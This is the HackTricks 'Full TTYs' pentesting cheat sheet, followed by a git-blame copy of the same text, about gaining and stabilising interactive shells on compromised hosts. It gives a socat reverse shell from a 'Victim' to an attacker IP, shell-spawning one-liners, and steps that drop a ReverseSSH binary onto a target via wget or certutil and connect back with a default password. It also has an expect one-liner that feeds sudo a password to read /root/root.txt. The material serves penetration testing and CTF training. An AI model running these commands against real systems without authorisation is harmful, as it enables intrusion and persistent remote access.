hacktricks/generic-methodologies-and-resources/shells/full-ttys.md

# Full TTYs

<details>

<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Full TTY

Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.

#### Python

{% code overflow="wrap" %}
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'

(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
```
{% endcode %}

{% hint style="info" %}
You can get the **number** of **rows** and **columns** executing **`stty -a`**
{% endhint %}

#### script

{% code overflow="wrap" %}
```bash
script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
```
{% endcode %}

#### socat

```bash
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```

### **Spawn shells**

* `python -c 'import pty; pty.spawn("/bin/sh")'`
* `echo os.system('/bin/bash')`
* `/bin/sh -i`
* `script -qc /bin/bash /dev/null`
* `perl -e 'exec "/bin/sh";'`
* perl: `exec "/bin/sh";`
* ruby: `exec "/bin/sh"`
* lua: `os.execute('/bin/sh')`
* IRB: `exec "/bin/sh"`
* vi: `:!bash`
* vi: `:set shell=/bin/bash:shell`
* nmap: `!sh`

## ReverseSSH

A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target.

Below is an example for `x86` with upx-compressed binaries. For other binaries, check [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/).

1. Prepare locally to catch the ssh port forwarding request:

{% code overflow="wrap" %}
```bash
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -v -l -p 4444
```
{% endcode %}

* (2a) Linux target:

{% code overflow="wrap" %}
```bash
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
```
{% endcode %}

* (2b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)):

{% code overflow="wrap" %}
```bash
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe

reverse-ssh.exe -p 4444 kali@10.0.0.2
```
{% endcode %}

* If the ReverseSSH port forwarding request was successful, you should now be able to log in with the default password `letmeinbrudipls` in the context of the user running `reverse-ssh(.exe)`:

```bash
# Interactive shell access
ssh -p 8888 127.0.0.1

# Bidirectional file transfer
sftp -P 8888 127.0.0.1
```

## No TTY

If for some reason you cannot obtain a full TTY you **still can interact with programs** that expect user input. In the following example, the password is passed to `sudo` to read a file:

```bash
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
```

<details>

<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`# Full TTYs`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
			`* Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`## Full TTY`
GitBook: [master] 3 pages modified 2020-08-19 11:54:25 +00:00
Update full-ttys.md 2022-09-13 16:44:14 +00:00			Note that the shell you set in the `SHELL` variable must be listed inside _/etc/shells_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
GitBook: [master] 3 pages modified 2020-08-19 11:54:25 +00:00
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`#### Python`

			`{% code overflow="wrap" %}`
GitBook: [master] 3 pages modified 2020-08-19 11:54:25 +00:00			```bash
GitBook: [master] one page modified 2021-03-10 17:37:53 +00:00			`python3 -c 'import pty; pty.spawn("/bin/bash")'`
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00
GitBook: [master] 3 pages modified 2020-08-19 11:54:25 +00:00			`(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;`
			```
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`{% endcode %}`

			`{% hint style="info" %}`
			You can get the number of rows and columns executing `stty -a`
			`{% endhint %}`
GitBook: [master] 3 pages modified 2020-08-19 11:54:25 +00:00
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`#### script`

			`{% code overflow="wrap" %}`
GitBook: [master] 3 pages modified 2020-08-19 11:54:25 +00:00			```bash
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`script /dev/null -qc /bin/bash #/dev/null is to not store anything`
GitBook: [master] 9 pages and 12 assets modified 2021-06-24 23:53:47 +00:00			`(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;`
GitBook: [master] 3 pages modified 2020-08-19 11:54:25 +00:00			```
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`{% endcode %}`

			`#### socat`
GitBook: [master] 3 pages modified 2020-08-19 11:54:25 +00:00
GitBook: [master] one page modified 2020-12-12 00:12:28 +00:00			```bash
			`#Listener:`
			socat file:`tty`,raw,echo=0 tcp-listen:4444

			`#Victim:`
			`socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444`
			```

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`### Spawn shells`
GitBook: [master] 3 pages modified 2020-08-19 11:54:25 +00:00
			* `python -c 'import pty; pty.spawn("/bin/sh")'`
			* `echo os.system('/bin/bash')`
			* `/bin/sh -i`
			* `script -qc /bin/bash /dev/null`
			* `perl -e 'exec "/bin/sh";'`
			* perl: `exec "/bin/sh";`
			* ruby: `exec "/bin/sh"`
			* lua: `os.execute('/bin/sh')`
			* IRB: `exec "/bin/sh"`
			* vi: `:!bash`
			* vi: `:set shell=/bin/bash:shell`
			* nmap: `!sh`

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`## ReverseSSH`
Add ReverseSSH section to full-ttys.md 2021-07-21 19:20:57 +00:00
			`A convenient way for interactive shell access, as well as file transfers and port forwarding, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target.`

			Below is an example for `x86` with upx-compressed binaries. For other binaries, check [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/).

			`1. Prepare locally to catch the ssh port forwarding request:`

GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`{% code overflow="wrap" %}`
Add ReverseSSH section to full-ttys.md 2021-07-21 19:20:57 +00:00			```bash
			`# Drop it via your preferred way, e.g.`
			`wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh`

Adapt usage of ReverseSSH to latest release 2021-12-13 21:50:46 +00:00			`/dev/shm/reverse-ssh -v -l -p 4444`
Add ReverseSSH section to full-ttys.md 2021-07-21 19:20:57 +00:00			```
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`{% endcode %}`
Add ReverseSSH section to full-ttys.md 2021-07-21 19:20:57 +00:00
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`* (2a) Linux target:`
Add ReverseSSH section to full-ttys.md 2021-07-21 19:20:57 +00:00
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`{% code overflow="wrap" %}`
Add ReverseSSH section to full-ttys.md 2021-07-21 19:20:57 +00:00			```bash
			`# Drop it via your preferred way, e.g.`
			`wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh`

			`/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2`
			```
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`{% endcode %}`
Add ReverseSSH section to full-ttys.md 2021-07-21 19:20:57 +00:00
GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`* (2b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)):`
Add ReverseSSH section to full-ttys.md 2021-07-21 19:20:57 +00:00
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`{% code overflow="wrap" %}`
GitBook: [master] 503 pages and 11 assets modified 2021-07-26 15:11:57 +00:00			```bash
Add ReverseSSH section to full-ttys.md 2021-07-21 19:20:57 +00:00			`# Drop it via your preferred way, e.g.`
			`certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe`

			`reverse-ssh.exe -p 4444 kali@10.0.0.2`
			```
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`{% endcode %}`
Add ReverseSSH section to full-ttys.md 2021-07-21 19:20:57 +00:00
Update full-ttys.md 2022-09-13 16:44:14 +00:00			* If the ReverseSSH port forwarding request was successful, you should now be able to log in with the default password `letmeinbrudipls` in the context of the user running `reverse-ssh(.exe)`:
Add ReverseSSH section to full-ttys.md 2021-07-21 19:20:57 +00:00
			```bash
			`# Interactive shell access`
			`ssh -p 8888 127.0.0.1`

			`# Bidirectional file transfer`
			`sftp -P 8888 127.0.0.1`
			```

GitBook: [#3195] No subject 2022-05-08 23:13:03 +00:00			`## No TTY`
GitBook: [master] 3 pages modified 2020-08-19 11:54:25 +00:00
Update full-ttys.md 2022-09-13 16:44:14 +00:00			If for some reason you cannot obtain a full TTY you still can interact with programs that expect user input. In the following example, the password is passed to `sudo` to read a file:
GitBook: [master] 3 pages modified 2020-08-19 11:54:25 +00:00
			```bash
			`expect -c 'spawn sudo -S cat "/root/root.txt";expect "password";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'`
			```

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GITBOOK-3850: change request with no subject merged in GitBook 2023-03-30 19:24:10 +00:00			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
			`* Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`